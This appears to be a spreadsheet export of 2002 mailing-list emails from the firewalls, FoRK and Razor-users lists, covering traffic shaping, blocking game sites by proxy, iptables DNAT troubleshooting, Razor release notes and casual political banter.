exceeded? Whoops. Okay, let's assume for a second that the packets aren't actually delayed, but that the ACK sequence numbers or TCP window size fields are re-written (dicey). All you've accomplished is move the queueing (delaying) from the traffic shaper to the endpoints. You still get L7-to-L7 delays. Big deal if it happens on the wire or in the stack. Also, convincing endpoints to do delays probably results in less-than-perfect shaping since stack retransmit timings suddenly affect the actual bandwidth available rather than having the shaper itself do it; the shaper knows exactly when there is bandwidth available. But this doesn't even begin to touch on other protocols like UDP or ICMP. Or, for that matter, IPsec/GRE/whatever tunneled traffic. Neither of them have sequence numbers or window sizes that you can manipulate. So, I'm forced to conclude that the PacketShaper either sucks in a major way, or that your explanation/the explanation that you have been given of it is wrong. (Sorry.) What I think happens is that the delay is &lt;=2msec as long as traffic limits aren't exceeded. This is reasonable. BUT when traffic exceeds the limits, things will begin to be queued. Now, with a well-behaved TCP stack, this _will_ mean that it will fall back to lower transmission rates; this is how TCP was designed, so that part isn't all wrong. And, again, this kind of shaping isn't rocket science. That is not to say that there are shapers out there that are just being plain dumb (always queueing and the selecting what gets transmitted out of the queue), but, well, I just can't see that you can get any smarter than queueing when limits are actually exceeded.  _Maybe_ you can do a special case for TCP and try to offload some of the queueing on the endpoints, but I really don't see the real gain in that. Respectfully, /Mikael Olsson -- Mikael Olsson, Clavister AB Storgatan 12, Box 393, SE-891 28 RNSKLDSVIK, Sweden Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05 Fax: +46 (0)660 122 50       WWW: [URL]http://www.clavister.com[/URL] "It's July. I'm on vacation. Can't you tell? :)" -- Firewalls mailing list - [ firewalls@isc.org ] To unsubscribe: [URL]http://www.isc.org[/URL] ------------------------------ From: "Hiemstra, Brenno"  Subject: FW: disable some sites Date: Thu, 25 Jul 2002 13:44:18 +0200 The list addy changed ofcourse   :o) &gt; -----Original Message----- &gt; From:	Hiemstra, Brenno  &gt; Sent:	donderdag 25 juli 2002 12:27 &gt; To:	'Michael Zhao'; Hiemstra, Brenno &gt; Cc:	firewalls@lists.gnac.net &gt; Subject:	RE: disable some sites &gt;  &gt; Michael, &gt;  &gt; If I was in your shoes I would first investigate if there &gt; is a security policy in your organisation. If you dont know &gt; what I mean by a security policy I would advice you to  &gt; start reading about it. A search on google would be of a &gt; big help for you. &gt;  &gt; If there is a security policy I would read it and investigate &gt; what is tells about how employees are able to use their &gt; workstations for performing their function. In a security  &gt; policy there should be things what employees are allowed &gt; to do on the network / internet and what not. &gt;  &gt; If there isnt a security policy I would advice you to implement &gt; one in your company. Because without one you cant punish &gt; employees by violating the policy and if there is a court case &gt; you dont have any rock solid thing to smack around with. &gt;  &gt; Without a policy you are just implementing solutions to prevent &gt; employees in doing things that, im my opinion, they arent allowed &gt; to do on their workstations anyway. I dont like the idea that  &gt; employees play games, use kazaa, ICQ, MSN, etc etc in stead &gt; of working what we pay them to do. This is why a security policy &gt; is important because then you can say to employees that they &gt; violated it and that there are consequences for that (deny internet &gt; access, etc etc). &gt;  &gt; Owkee...    now that this is out of the way time to proceed about &gt; the proxy thingie. &gt;  &gt; A proxy dont have to be the default gateway of your network to &gt; use it. It is a function in Internet Explorer or whatever browser you &gt; use in your network. &gt;  &gt; If you ask me Checkpoint Firewalls are just good in using for what &gt; their real purpose is and that is firewalling a network. I dont like the &gt; idea that my firewall is also CVS http thingie because I dont think &gt; a firewall is its purpose to do that. Proxies are a much better solutions &gt; for that and they are also developed for that purpose. &gt;  &gt; Depending on your network setup and the OS and Proxy brand of your &gt; current proxy you have several solutions which was already provided  &gt; by people on this list. My favorite proxy is Squid and there are probably &gt; a lot of http blacklist programs that work with Squid to block websites &gt; and stuff. &gt;  &gt; I still think you should first deny direct internet traffic from &gt; workstations. &gt; and only allow traffic to the internet from servers that are allowed to do &gt; so. You should think about proxies, email servers, etc etc. This should &gt; also prevent people from playing games, especially those Quake kinda &gt; games because those use ports that arent necessary for normal  &gt; webbrowsing. Games running over port 80 and not http related are blocked &gt; by the proxy if that proxy is a true Layer 7 application layer proxy. &gt; These &gt; kinda proxies can view in the TCP/IP packet and see if this is legitimate  &gt; http traffic or that someone tries to tunnel something over port 80. &gt;  &gt; Anyway...    again food for some thoughts, &gt;  &gt; Regards, &gt;  &gt;  &gt;  &gt; Brenno &gt;  &gt;  &gt; -----Original Message----- &gt; From:	Michael Zhao [SMTP:mzhao@everlastingsystems.com] &gt; Sent:	woensdag 24 juli 2002 2:38 &gt; To:	Hiemstra, Brenno &gt; Cc:	firewalls@lists.gnac.net &gt; Subject:	Re: disable some sites &gt;  &gt; Thanks your reply. &gt;  &gt; I built up my network three years ago . I have proxy which we only use  &gt; cache to accelerate our internet accessing , it is not a gateway . It is  &gt; too difficult to change the topology , many thing need to be changed. &gt;  &gt; Did you have another idea to help me? Someone suggest me to buy the  &gt; websence , but I dont have the budget right now. &gt;  &gt; Thanks a lot &gt;  &gt; Michael &gt;  &gt; Hiemstra, Brenno wrote: &gt;  &gt; &gt;Michael, &gt; &gt; &gt; &gt;The first thing is to build a security policy that &gt; &gt;states what people are allowed to do and what &gt; &gt;not. Everyone needs to accept this policy and  &gt; &gt;if they violate it you can apply rules that you state &gt; &gt;in your security policy. &gt; &gt; &gt; &gt;If I had the option for your network setup I would &gt; &gt;install a proxy server and demand every client &gt; &gt;to connect to the proxy if they want to use the  &gt; &gt;internet. &gt; &gt; &gt; &gt;The proxy will only allow http, ftp, and other "approved" &gt; &gt;services to connect to the internet. And you can let &gt; &gt;them check to some database which websites are &gt; &gt;allowed and deny access to sites that aren't allowed &gt; &gt; &gt; &gt;Your company firewall will only allow the proxy to connect &gt; &gt;to the internet. Clients are denied. &gt; &gt; &gt; &gt;This way the clients cant connect directly to the internet &gt; &gt;game servers and on the proxy you can deny clients &gt; &gt;to connect to the game servers. &gt; &gt; &gt; &gt;I hope this is an option for you. &gt; &gt; &gt; &gt;Regards, &gt; &gt; &gt; &gt; &gt; &gt;Brenno &gt; &gt; &gt; &gt;&gt;-----Original Message----- &gt; &gt;&gt;From:	Michael Zhao [SMTP:mzhao@everlastingsystems.com] &gt; &gt;&gt;Sent:	dinsdag 23 juli 2002 14:10 &gt; &gt;&gt;To:	firewalls@lists.gnac.net &gt; &gt;&gt;Subject:	disable some sites &gt; &gt;&gt; &gt; &gt;&gt;Hi , all &gt; &gt;&gt; &gt; &gt;&gt;I choose checkpoint fw-1 as my firewall . I found many company users  &gt; &gt;&gt;play internet games like CS, ourgame . I find users download their  &gt; &gt;&gt;clients software and install  on their local workstation , after run it  &gt; &gt;&gt;, the programe can connect to game server automatically . &gt; &gt;&gt; &gt; &gt;&gt;Usally , there are many sites of every internet game server. I.E. I want &gt;  &gt; &gt;&gt;disable accessing the game servers like xxx.ourgame.com from my internal &gt;  &gt; &gt;&gt;net , how can I do that except find all of their IP address , because it &gt;  &gt; &gt;&gt;is so complecat to do . Who can tell me . &gt; &gt;&gt; &gt; &gt;&gt;Regards, &gt; &gt;&gt;Michael &gt; &gt;&gt; &gt; &gt;&gt;--  &gt; &gt;&gt;Firewalls mailing list - [ firewalls@isc.org ] &gt; &gt;&gt;To unsubscribe: [URL]http://www.isc.org[/URL] &gt; &gt;&gt; &gt;  ------------------------------ Date: Thu, 25 Jul 2002 15:08:21 -0600 From: Jerry Lynde  Subject: DNAT with iptables question Howdy folks, I've been scouring the online docs for solid info on how to accomplish DNAT  with iptables. Essentially, I have converted the ipmasqadm lines of the form... ipmasqadm portfw -a -P tcp -L $WEB_OUT  http    -R $WEB_IN      http to iptables lines of the form... $IPTABLES -A PREROUTING -t nat -p tcp -d $WEB_OUT --dport 80 -j DNAT --to  $WEB_IN:80 with the accompanying lines... $IPTABLES -A FORWARD -i $INTIF -o $EXTIF -m state --state  ESTABLISHED,RELATED -j ACCEPT $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -m state --state  ESTABLISHED,RELATED -j ACCEPT $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -p tcp -j ACCEPT The last two lines seem functionally sorta redundant, but I threw em in in  an effort to make this work. So far, I am unable to show that it's working correctly... I even tried  logging all packets... $IPTABLES -A FORWARD -i $INTIF -p tcp -j LOG --log-level info $IPTABLES -A FORWARD -i $EXTIF -p tcp -j LOG --log-level info But nothing show up in /var/log/messages or anywhere else for that matter.  This is on a Redhat 7.3 box. Any help, clues, flames, RT(his particular)FM, etc are appreciated. I read the list, so please don't reply directly in addition to the list  resposne. Thanks, Jer  ------------------------------ From: "Reckhard, Tobias"  Subject: RE: DNAT with iptables question Date: Fri, 26 Jul 2002 08:32:37 +0200 &gt; $IPTABLES -A PREROUTING -t nat -p tcp -d $WEB_OUT --dport 80  &gt; -j DNAT --to  &gt; $WEB_IN:80 &gt;  &gt; with the accompanying lines... &gt;  &gt;  &gt; $IPTABLES -A FORWARD -i $INTIF -o $EXTIF -m state --state  &gt; ESTABLISHED,RELATED -j ACCEPT &gt; $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -m state --state  &gt; ESTABLISHED,RELATED -j ACCEPT &gt; $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -p tcp -j ACCEPT &gt;  &gt; The last two lines seem functionally sorta redundant, but I  &gt; threw em in in  &gt; an effort to make this work. You're missing the NEW state. The initial SYN packet will not match with either of the first two rules. It should match the third if it's inbound, though. &gt; So far, I am unable to show that it's working correctly... I  &gt; even tried  &gt; logging all packets... &gt;  &gt; $IPTABLES -A FORWARD -i $INTIF -p tcp -j LOG --log-level info &gt; $IPTABLES -A FORWARD -i $EXTIF -p tcp -j LOG --log-level info &gt;  &gt; But nothing show up in /var/log/messages or anywhere else for  &gt; that matter.  You need to insert those logging rules above any ACCEPT, REJECT or DENY rules for them to be of any use. Are you sure the packets are hitting the box at all? Try moving the log rules to the top of the FORWARD chain, introduce logging rules to the PREROUTING, POSTROUTING, INPUT and OUTPUT chains, and/or use tcpdump as well to see where the packets are travelling. Cheers Tobias ------------------------------ End of firewalls Digest V1 #33 ******************************</t>
  </si>
  <si>
    <t>http://www.clavister.com http://www.isc.org http://www.isc.org</t>
  </si>
  <si>
    <t>To: chris arkenberg &lt;carkenbe@adobe.com&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Thu, 25 Jul 2002 23:04:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 23:04:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>chris arkenberg &lt;carkenbe@adobe.com&gt;</t>
  </si>
  <si>
    <t>Re: USA USA WE ARE NUMBER ....six.</t>
  </si>
  <si>
    <t>On Thu, 25 Jul 2002, chris arkenberg wrote:\n\n&gt; Perhaps people are starting to notice how profit motive drains the\n&gt; meaning out of their lives. Kinda sucks to be an ant farming for the\n&gt; corporate lords. Funny how most of the rest of the world is more and\n&gt; more apprehensive towards American Democracy.\n\nDrains what? My wallet you mean? America _is_ greed, that's who and what we\nare.\n\n&gt; I just went to DC for the first time. I was awestruck by the\n&gt; monuments, the words of Thomas Jefferson, the Spirit of Democracy set\n&gt; in stone. Amazing to think that in little more than 200 years our\n&gt; government could be so far removed from those honorable principles.\n&gt; Adam Smith presumed that the marketplace would regulate itself\n&gt; through morality, good faith, and responsibility.\n\nThose old white dudes could never see a world that wasnt ALL deeply\nreligeous (science wasnt up to speed yet). How could you not hold these\nprinciples as just how you should act? They got that religeon and government\nshould not be the same thing, they didnt get that when society doesnt have\nany beliefs are all (capitalism is more atheist then communism ever was) it\nquickly goes to hell as some people have 100 billion and all the rest have\ntoo dolla a day.\n\nHaving been raised in a generally ethical way, it was a big jump to learn to\nrun a business. Lots of lessions in being ruthless, and a few about being\nsure to hire large Italians to do debt collection (it works!).\n\n&gt; Corporate America seems to feel that those principles stand in the way\n&gt; of making the real bucks.\n\nNo shit, really? Seriously, if you're not all about screwing over the\ncustomer, there is no place for you in the ruling class, and you certainly\ncant play the American game.\n\n&gt; Ah, socialized medicine. Siestas. 6 week vacation leave. I hear Spain is\n&gt; nice this time of year...\n\nThat's living, here we only work, buy, and work more to buy more, like rats\non a wheel. I can't wait to be rich enough to move somewhere nice, if they\nwill let me get out alive that is.\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Thu, 25 Jul 2002 22:48:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 22:48:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Thu, 25 Jul 2002, Joseph S. Barrera III wrote:\n\n&gt; chris arkenberg wrote:\n&gt; &gt; Cheers, Adam.\n&gt; &gt;\n&gt; &gt; Perhaps people are starting to notice how profit motive drains the\n&gt; &gt; meaning out of their lives.\n&gt;\n&gt; And, having realized that, a lot of them are now having babies.\n&gt; I can't believe the number of friends at work who are now pregnant\n&gt; or have already just had their babies.\n\nThe 9/11 boom is now well underway. Screaming newborns everywhere...\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Kylus &lt;kylus@pizzle.org&gt;, razor-users@example.sourceforge.net\nFrom: John Andersen &lt;jsa@pen.homeip.net&gt;\nDate: Thu, 25 Jul 2002 21:45:42 -0800</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 21:45:42 -0800</t>
  </si>
  <si>
    <t>Kylus &lt;kylus@pizzle.org&gt;, razor-users@example.sourceforge.net</t>
  </si>
  <si>
    <t>Re: [Razor-users] unsubscribe</t>
  </si>
  <si>
    <t>On Thursday 25 July 2002 06:16 am, Kylus wrote:\n&gt; Much thanks and my apologies if I come across as a jerk.\n\nIt needed saying.  Thanks for stepping up.\n\n-- \n_________________________________________________\nNo I Don't Yahoo!\nAnd I'm getting pretty sick of being asked if I do.\n_________________________________________________\nJohn Andersen / Juneau Alaska\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Gordon Mohr" &lt;gojomo@usa.net&gt;\nDate: Thu, 25 Jul 2002 20:41:45 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 20:41:45 -0700</t>
  </si>
  <si>
    <t>Gary Lawrence Murphy writes:\n&gt; 20,000 years ago, one of them the size of Mt Everest just ever so\n&gt; slightly grazed us and left a scar 400km long in the side of South\n&gt; America before it scooted out into space.  First nations people would\n&gt; have been there then, and it would have seriously ruined their day.\n\nDo you have any further information about this incident that\nwould me find more details on the web?\n\n- Gordon\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 25 Jul 2002 19:56:46 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 19:56:46 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wear Sunscreen</t>
  </si>
  <si>
    <t>"Yes, and Eliza and I composed a precocious critique of the Constitution\nof the United States of America, too. We argued that it was as good a\nscheme for misery as any, since its success in keeping the common people\nreasonably happy and proud depended on the strength of the people\nthemselves - and yet it described no practical machinery which would tend\nto make the people, as opposed to their elected representatives, strong.\n    We said it was possible that the framers of the Constitution were\nblind to the beauty of persons who were without great wealth or powerful\nfriends or public office, but who were nonetheless genuinely strong.\n    We thought it was more likely, though, that the framers had not\nnoticed that it was natural, and therefore almost inevitable, that human\nbeings in extraordinary and enduring situations should think of themselves\nas composing new families. Eliza and I pointed out that this happened no\nless in democracies than in tyrannies, since human beings were the same\nthe wide world over, and civilized only yesterday.\n    Elected representatives, hence, could be expected to become members of\nthe famous and powerful family of elected representatives - which would,\nperfectly naturally, make them wary and squeamish and stingy with respect\nto all the other sorts of families which, again, perfectly naturally,\nsubdivided mankind.\n    Eliza and I, thinking as halves of a single genius, proposed that the\nConstitution be amended so as to guarantee that every citizen, no matter\nhow humble or crazy or incompetent or deformed, somehow be given\nmembership in some family as covertly xenophobic and crafty as the one\ntheir public servants formed.\n    Good for Eliza and me!\n    Hi ho."\n\nKurt V\nSlapstick\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 25 Jul 2002 19:46:26 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 19:46:26 -0400 (EDT)</t>
  </si>
  <si>
    <t>On Thu, 25 Jul 2002, Joseph S. Barrera III wrote:\n\n--]And, having realized that, a lot of them are now having babies.\n--]I can't believe the number of friends at work who are now pregnant\n--]or have already just had their babies.\n\nWe hope that in the next generation we can bring back what we once thought\nof as our future, or more aptly thier future will be a shade better than\nwhat ours is turning out to be.\n\nI cant help but appologise to my wifes bulging middle in these last few\ndyas of the pregancy. I wanted so much more for him. My daughter and I\ntalk about this in the ways an 8 year old can with a 39 year old. She\nrealizes things are not all they could have been, but shes sort of ready\nfor the challange. She told me the other day she would get to the moon if\nI dont. Gota love kids, they say the coolest things at just the right\ntimes.\n\nAs for profit and the drive towars it...moeny is simply a tool,simply one\nway of many to facilitate living the life you want. Too many have taken\nthe tool for the goal, the race for the prize and the notion that first is\nall.\n\nYea yea, this sad burlesque.\n\n-tom\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: =?iso-8859-1?Q?J=F8rgen?= Thomsen &lt;list@jth.net&gt;\nFrom: Chad Norwood &lt;chad@cloudmark.com&gt;\nDate: Thu, 25 Jul 2002 18:33:15 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 18:33:15 -0700</t>
  </si>
  <si>
    <t>Chad Norwood &lt;chad@cloudmark.com&gt;</t>
  </si>
  <si>
    <t>=?iso-8859-1?Q?J=F8rgen?= Thomsen &lt;list@jth.net&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Re: Content-Type: message/rfc822  supported ?</t>
  </si>
  <si>
    <t>Not sure what you're asking.     Content-Type: message/rfc822 mails are handled like attachments   and are not broken down further into mime parts.  That is, the attachment   is treated as one part.  The headers and body of the message/rfc822 are   sent to the server without parsing.  The other way to handle it is to treat it like   a regular mail, and break it down into parts.      There are reasons to break it down and not to break it down, and right    now we chose not to break it down.  This might change in the future.   -chad On 26/07/02 02:24 +0200, Jrgen Thomsen wrote: ) I cannot determine if a verbatim forwarded message from Agent is handled ) correctly i.e. that a message with Content-Type: message/rfc822 does not ) include the original header lines improperly in the email body when reporting ) the spam. It would be really nice and convenient if it supported as the Agent ) verbatim forwarding option is easy to use.  ) SpamCop does understand the format. ) See an examle below: )  ) - Jrgen )  ) Return-Path:  ) Delivered-To: jth@jth.net ) Received: from vennely1 (vennely1 [194.192.106.109]) ) 	by mail.jth.net (Postfix) with SMTP id 17A9118684 ) 	for ; Fri, 26 Jul 2002 02:15:03 +0200 (CEST) ) From: =?ISO-8859-1?Q?J=F8rgen_Thomsen?=  ) To: j@jth.net ) Subject: (fwd) [Razor-users] Razor Agents 2.14 Released ) Date: Fri, 26 Jul 2002 02:14:57 +0200 ) Message-ID:  ) X-Mailer: Forte Agent 1.91/32.564 ) MIME-Version: 1.0 ) Content-Type: message/rfc822 ) Content-Disposition: inline )  ) Return-Path:  ) Delivered-To: list@jth.net ) Received: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net ) [216.136.171.252]) ) 	by mail.jth.net (Postfix) with ESMTP id 88B0F18684 ) 	for ; Fri, 26 Jul 2002 01:18:00 +0200 (CEST) )  ) and the rest of the original header and the body )  )  ) ------------------------------------------------------- ) This sf.net email is sponsored by: Jabber - The world's fastest growing  ) real-time communications platform! Don't just IM. Build it in!  ) [URL]http://www.jabber.com[/URL] ) _______________________________________________ ) Razor-users mailing list ) Razor-users@lists.sourceforge.net ) [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Tom &lt;tomwhore@slack.net&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Thu, 25 Jul 2002 17:18:57 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 17:18:57 -0700</t>
  </si>
  <si>
    <t>Re: Wear Sunscreen</t>
  </si>
  <si>
    <t>Tom wrote:\n&gt;     Eliza and I, thinking as halves of a single genius, proposed that the\n&gt; Constitution be amended so as to guarantee that every citizen, no matter\n&gt; how humble or crazy or incompetent or deformed, somehow be given\n&gt; membership in some family as covertly xenophobic and crafty as the one\n&gt; their public servants formed.\n\nThat was Such a Fucking Depressing Book.\nI must have read it seven or eight times.\n\n- Joe Daisy-38 Barrera.\n-- \nLeft behind the bars\nRows of Bishops' heads in jars\nAnd a bomb inside a car\nSpectacular, spectacular\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: "Gregory Alan Bolcer" &lt;gbolcer@endeavors.com&gt;\nDate: Thu, 25 Jul 2002 16:54:59 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 16:54:59 -0700</t>
  </si>
  <si>
    <t>OpenWave</t>
  </si>
  <si>
    <t>OPWV and a bad moon rising.\n\n&gt; Zacks Issues Recommendations on 4 Stocks: DYN, MANU, SWY and OPWV\n&gt; \n&gt; PR Newswire, Thursday, July 25, 2002 at 06:03\n&gt; \n&gt; /FROM PR NEWSWIRE CHICAGO 888-776-6551/ [STK] DYN MANU SWY OPWV [IN] FIN MLM [SU] INO -- \n\n\nWITH PHOTO -- TO BUSINESS EDITOR:\n&gt; \n&gt; Zacks Issues Recommendations on 4 Stocks: DYN, MANU, SWY and OPWV\n&gt; \n&gt; CHICAGO, July 25 /PRNewswire/ -- Zacks.com releases details on four more \n\nstocks that are part of their exclusive list of Stocks to Sell Now. These \n\nstocks are currently rated as a Zacks Rank #5 (Strong Sell). These stocks have \n\nbeen proven to under-perform the S&amp;P 500 by 89.8% since its inception in 1980. \n\nWhile the rest of Wall Street continued to tout stocks during the market declines \n\nof the last few years, we were telling our customers which stocks to sell in order \n\nto save themselves the misery of unrelenting losses. Among the #5 ranked stocks today \n\nwe highlight the following companies: Dynegy, Inc. (NYSE:DYN) and Manugistics Group, Inc. \n\n(NASDAQ:MANU), Safeway, Inc. (NYSE:SWY) and Openwave Systems, Inc. (NASDAQ:OPWV). To see \n\nthe full Zacks #5 Ranked list of Stocks to Sell Now then visit [URL]http://stockstosellpr.zacks.com[/URL] .\n\n\n-- \nGregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com\nEndeavors Technology, Inc. | cell: +1.714.928.5476 | [URL]http://endeavors.com[/URL]\n\n\n\n\n\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://stockstosellpr.zacks.com http://endeavors.com http://xent.com</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net,\nFrom: Chad Norwood &lt;chad@cloudmark.com&gt;\nDate: Thu, 25 Jul 2002 16:11:15 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 16:11:15 -0700</t>
  </si>
  <si>
    <t>razor-users@example.sourceforge.net,</t>
  </si>
  <si>
    <t>[Razor-users] Razor Agents 2.14 Released</t>
  </si>
  <si>
    <t>This is a stable beta release.  Please to upgrade. [URL]http://prdownloads.sourceforge.net[/URL] I've listed below all changes since the last major release, 2.12. These are also in the Changes file included with the tar.gz. -chad 2.14 (July 25, 2002)       Added Digest::Nilsimsa and URI::Escape to Make-        file.PL's prerequisites.  [vipul]       Fixed rare bug in report.  Thanks goes to "Alan A."         for this and much more help.  [chad] 2.126 (July 24, 2002)       Improved logic again for detecting spam.  [chad,        vipul]       Run-time warnings are disabled unless in debug mode.        [chad] 2.125 (July 18, 2002)       Improved logic for detecting spam, now we only look at        visible and/or significant mime parts.  [chad, vipul]       Mime parts cleaned to only whitespace are now ignored        on the client side, that is, they are not checked        against server [chad]       Fixed bug in report (err 202) [chad]       Quieted more warnings [chad] 2.123 (July 17, 2002)       Fixed bug in revoke/report [chad]       Whitelist now looks at all 'Received:' headers for        matching [chad]       Added debuglevel, whitelist cmd-line options [chad]       Quieted more warnings [chad] 2.122 (July 15, 2002)       Renamed razor-register razor-admin. To register, you        must 'razor-admin -register' [chad]       Cleanded up how we store mail parts.  Each mail object        now has a part object that stores info relevant to        that part.  [chad]       Fixed parse_mbox (reading mbox and rfc822 mails)        [chad]       Backup any existing identity files before writing over        them (with new identity) [chad]       Added lock file support, so only one process writes to        servers.*.lst at a time [chad]       Added rediscover_wait_dns [chad]       Fixed a bug when we rediscover, we save info to list        correctly but when using it we skip the first server        [chad]       Fixed whitelist so rule 'from xx' only matches 'From:        .*xx' not 'From .*xx' (Note the ':') [chad]       Made exit codes cleaner [chad]         0 or 1       =&gt; no error         2 or greater =&gt; error       Fixed error msg/exit code after disconnect [chad]       Added -w to razor binaries [chad]       If authen fails 'cuz unknown user (213), attempt re-        register [chad]       Quieted a bunch of warnings [chad] ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://prdownloads.sourceforge.net http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Thu, 25 Jul 2002 15:58:23 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:58:23 -0700</t>
  </si>
  <si>
    <t>&gt; chris arkenberg wrote:\n&gt; &gt; Cheers, Adam.\n&gt; &gt; \n&gt; &gt; Perhaps people are starting to notice how profit motive drains the \n&gt; &gt; meaning out of their lives.\n&gt; \n&gt; And, having realized that, a lot of them are now having babies.\n&gt; I can't believe the number of friends at work who are now pregnant\n&gt; or have already just had their babies.\n\n.boom?\n\n- Jim\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: bitbitch@magnesium.net\nFrom: "Jon O." &lt;jono@networkcommand.com&gt;\nDate: Thu, 25 Jul 2002 15:48:46 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:48:46 -0700</t>
  </si>
  <si>
    <t>Has anyone considered the fact that these occurrances appear to be increasing. I'm aware that maybe more publicity surrounding some and certain agencies have been granted more funding, but  I'd like to see some data which shows if these are increasing or not.  Why? Well, it seems to me if we were going to get hit, the one that does it may have been part of a larger swarm or cluster which has over the years increased the distance between the rocks. Like the Schumaker Levy-9, which had multiple rocks all impacting at different times, others may have this same type of design and could be in different stages of increasing distance from one another. Also to consider is if SL-9 was on course for earth, would we get hit by all rocks or only one because the earth is a much smaller target than Jupiter? So, my theory is that if these near earth rocks are increasing so does our chance of discovering the last three were part of a swarm of 15 of which 10, 11 and 12 may hit. On 24-Jul-2002, bitbitch@magnesium.net wrote: &gt; &gt; &gt; &gt; Hit or miss, Groundhog Day 2019 is going to be one heck of a show. Book &gt; &gt; early, avoid the rush. &gt;  &gt; Hey, meybee by then, Bush's grand plan for a missle defense system will &gt; actually pan out and -work- ... &gt; I'm not holding my breath, but i'm not going to panic for something thats &gt; a little under 17 years away, either. &gt; -c &gt;  &gt; &gt; &gt; &gt; -- &gt; &gt; Gary Lawrence Murphy  TeleDynamics Communications &gt; &gt; Inc Business Innovations Through Open Source Systems: &gt; &gt; [URL]http://www.teledyn.com[/URL] "Computers are useless.  They can only give you &gt; &gt; answers."(Pablo Picasso) &gt; &gt; &gt; &gt; [URL]http://xent.com[/URL] &gt;  &gt;  &gt;  &gt; [URL]http://xent.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.teledyn.com http://xent.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: xxxxxx.yyyyyyyyyy@ruhr-uni-bochum.de\nFrom: "David&amp;TomGardner@fooladvisor.com"&lt;Subscriber@fooladvisor.com&gt;\nDate: Thu, 25 Jul 2002 15:39:47 EDT</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:39:47 EDT</t>
  </si>
  <si>
    <t>"David&amp;TomGardner@fooladvisor.com"&lt;Subscriber@fooladvisor.com&gt;</t>
  </si>
  <si>
    <t>xxxxxx.yyyyyyyyyy@ruhr-uni-bochum.de</t>
  </si>
  <si>
    <t>Your NEW "Leg-Up" on Wall Street...</t>
  </si>
  <si>
